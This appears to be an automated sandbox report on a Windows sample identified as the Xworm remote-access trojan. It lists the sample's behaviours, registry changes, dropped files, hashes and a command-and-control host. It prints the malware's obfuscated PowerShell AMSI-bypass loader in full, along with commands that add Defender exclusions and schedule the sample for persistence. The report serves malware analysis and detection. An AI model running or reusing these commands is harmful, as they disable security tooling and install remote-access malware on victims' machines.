Analysis Overview
SHA256
4ec3fbfb426c8f24e10b05f3410f002520161f61c0d6ee0973ddc4ccf5e023be
Threat Level: Known bad
The file M5TTL.exe was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Detect Xworm Payload
Xworm
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Adds Run key to start application
Drops file in System32 directory
Suspicious use of SetThreadContext
Enumerates physical storage devices
Unsigned PE
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-14 23:17
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-14 23:17
Reported
2024-06-14 23:18
Platform
win10-20240404-en
Max time kernel
18s
Max time network
18s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4280 created 584 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\x4RunTime x4Broker.exe | N/A |
| N/A | N/A | C:\Windows\System32\x4Shellcode.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" | C:\Windows\System32\x4RunTime x4Broker.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\x4RunTime x4Broker.exe | C:\Users\Admin\AppData\Local\Temp\M5TTL.exe | N/A |
| File created | C:\Windows\System32\x4Shellcode.exe | C:\Users\Admin\AppData\Local\Temp\M5TTL.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\svchost | c:\windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4280 set thread context of 4384 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
c:\windows\system32\sihost.exe
sihost.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Users\Admin\AppData\Local\Temp\M5TTL.exe
"C:\Users\Admin\AppData\Local\Temp\M5TTL.exe"
C:\Windows\System32\x4RunTime x4Broker.exe
"C:\Windows\System32\x4RunTime x4Broker.exe"
C:\Windows\System32\x4Shellcode.exe
"C:\Windows\System32\x4Shellcode.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ILAGaaUBcHKy{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$zDQwpMTLgPYcHV,[Parameter(Position=1)][Type]$bjnOXKHaDb)$lohecdziSsW=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'Me'+[Char](109)+''+'o'+'r'+[Char](121)+''+'M'+'o'+[Char](100)+''+'u'+'l'+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+'le'+[Char](103)+'a'+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'',''+'C'+''+[Char](108)+''+[Char](97)+'ss'+[Char](44)+''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+','+'S'+'e'+'a'+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+'as'+'s'+''+[Char](44)+'A'+[Char](117)+''+[Char](116)+''+'o'+''+'C'+''+[Char](108)+'as'+[Char](115)+'',[MulticastDelegate]);$lohecdziSsW.DefineConstructor(''+[Char](82)+''+'T'+'S'+'p'+'e'+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+'e'+','+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$zDQwpMTLgPYcHV).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+'t'+'im'+'e'+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+'ge'+[Char](100)+'');$lohecdziSsW.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+'ke',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+','+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+'i'+''+[Char](103)+','+[Char](78)+''+[Char](101)+''+'w'+'Sl'+[Char](111)+'t'+','+''+'V'+''+[Char](105)+'r'+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$bjnOXKHaDb,$zDQwpMTLgPYcHV).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $lohecdziSsW.CreateType();}$XADQiCdyiBCxQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'st'+[Char](101)+''+[Char](109)+''+'.'+'d'+'l'+'l')}).GetType(''+[Char](77)+'i'+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.W'+'i'+''+[Char](110)+''+[Char](51)+'2'+'.'+''+[Char](85)+''+[Char](110)+''+'s'+'a'+'f'+''+[Char](101)+''+'N'+''+'a'+''+'t'+''+[Char](105)+'veM'+[Char](101)+''+[Char](116)+''+'h'+''+'o'+''+[Char](100)+''+[Char](115)+'');$UhTumxMANXRWQw=$XADQiCdyiBCxQ.GetMethod(''+[Char](71)+''+[Char](101)+'tP'+'r'+''+'o'+'c'+'A'+''+[Char](100)+''+'d'+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('P'+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+'t'+[Char](97)+''+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$tlurXCEzkcFVrIrrueY=ILAGaaUBcHKy @([String])([IntPtr]);$eSyUYzexEcJYYzLzbQMsuv=ILAGaaUBcHKy @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$NgbYANzWmAv=$XADQiCdyiBCxQ.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+'u'+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+''+[Char](100)+'le').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+''+'d'+''+[Char](108)+'l')));$JLONqLxaeztrLE=$UhTumxMANXRWQw.Invoke($Null,@([Object]$NgbYANzWmAv,[Object](''+[Char](76)+''+'o'+''+'a'+''+[Char](100)+''+'L'+'i'+[Char](98)+''+[Char](114)+'a'+'r'+''+[Char](121)+''+'A'+'')));$zPKyKpBzcKhFXydPe=$UhTumxMANXRWQw.Invoke($Null,@([Object]$NgbYANzWmAv,[Object](''+'V'+'i'+[Char](114)+''+[Char](116)+'u'+'a'+'l'+[Char](80)+''+[Char](114)+''+'o'+'te'+[Char](99)+''+[Char](116)+'')));$abzOLmI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JLONqLxaeztrLE,$tlurXCEzkcFVrIrrueY).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l');$gwXJzGndnviIZXsJl=$UhTumxMANXRWQw.Invoke($Null,@([Object]$abzOLmI,[Object]('A'+[Char](109)+''+[Char](115)+'i'+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+''+'u'+'f'+[Char](102)+''+'e'+''+'r'+'')));$RgaiBzuEoZ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zPKyKpBzcKhFXydPe,$eSyUYzexEcJYYzLzbQMsuv).Invoke($gwXJzGndnviIZXsJl,[uint32]8,4,[ref]$RgaiBzuEoZ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$gwXJzGndnviIZXsJl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zPKyKpBzcKhFXydPe,$eSyUYzexEcJYYzLzbQMsuv).Invoke($gwXJzGndnviIZXsJl,[uint32]8,0x20,[ref]$RgaiBzuEoZ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+'F'+''+'T'+'WA'+[Char](82)+''+[Char](69)+'').GetValue('x'+'4'+''+'s'+''+'t'+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{40d7ebd2-92ce-47f2-a45b-309d21c905f3}
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\x4RunTime x4Broker.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4RunTime x4Broker.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | edition-eat.gl.at.ply.gg | udp |
| US | 147.185.221.19:13576 | edition-eat.gl.at.ply.gg | tcp |
Files
memory/3660-0-0x00000000000E0000-0x0000000000118000-memory.dmp
memory/3660-1-0x00007FFAB4883000-0x00007FFAB4884000-memory.dmp
C:\Windows\System32\x4RunTime x4Broker.exe
| MD5 | c769af1ba52c8291a527f29bc06b3655 |
| SHA1 | 3f19a69c66b5014d6aef6fb52977d94503eac1e8 |
| SHA256 | 3bfc9c08fc80a764bf23c48f8d546191415901cf4023a2bfc247d3814cdc4eb1 |
| SHA512 | c7000c5b23e1e28b9eb63c822dd8908418292415120e195c6332c7b90809560173e0fc07fa9783e08a97e3ca392154491a5c16d97b949ac9a6e7bf2041099eb7 |
C:\Windows\System32\x4Shellcode.exe
| MD5 | 8a7bee2c8cec6ac50bc42fe03d3231e6 |
| SHA1 | ebc599a15f061a70f6b3ee74b9acfa4e3b4d299d |
| SHA256 | c8139f7fcde9c68cd331bcd438dfea7f02c463c6372dc477ab305da518483db8 |
| SHA512 | 34370b6f162cb752b1cb91d689705e6f0f247e02744bbbe85347d20cd89e02aba7c5e9e22bb63acc49b4fdc062de12ccf24f481a18c18d2094e1506bb143cad5 |
memory/1084-11-0x0000000000920000-0x0000000000936000-memory.dmp
memory/3660-13-0x00007FFAB4880000-0x00007FFAB526C000-memory.dmp
memory/1084-14-0x00007FFAB4880000-0x00007FFAB526C000-memory.dmp
memory/4280-19-0x00000208D8430000-0x00000208D8452000-memory.dmp
memory/4280-22-0x00000208F0970000-0x00000208F09E6000-memory.dmp
C:\Windows\Temp\__PSScriptPolicyTest_kn54ziuv.b4d.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4280-40-0x00000208F0930000-0x00000208F095A000-memory.dmp
memory/4280-42-0x00007FFABCA90000-0x00007FFABCB3E000-memory.dmp
memory/4280-41-0x00007FFABE7D0000-0x00007FFABE9AB000-memory.dmp
memory/4384-46-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4384-49-0x00007FFABE7D0000-0x00007FFABE9AB000-memory.dmp
memory/4384-50-0x00007FFABCA90000-0x00007FFABCB3E000-memory.dmp
memory/4384-48-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4384-45-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4384-44-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4384-43-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4384-54-0x0000000140000000-0x0000000140008000-memory.dmp
memory/584-58-0x0000027952490000-0x00000279524BC000-memory.dmp
memory/584-57-0x0000027952460000-0x0000027952486000-memory.dmp
memory/584-59-0x0000027952490000-0x00000279524BC000-memory.dmp
memory/584-66-0x00007FFA7E860000-0x00007FFA7E870000-memory.dmp
memory/584-65-0x0000027952490000-0x00000279524BC000-memory.dmp
memory/640-70-0x000001F427E30000-0x000001F427E5C000-memory.dmp
memory/640-76-0x000001F427E30000-0x000001F427E5C000-memory.dmp
memory/640-77-0x00007FFA7E860000-0x00007FFA7E870000-memory.dmp
memory/740-81-0x000001F987C50000-0x000001F987C7C000-memory.dmp
memory/740-88-0x00007FFA7E860000-0x00007FFA7E870000-memory.dmp
memory/900-99-0x00007FFA7E860000-0x00007FFA7E870000-memory.dmp
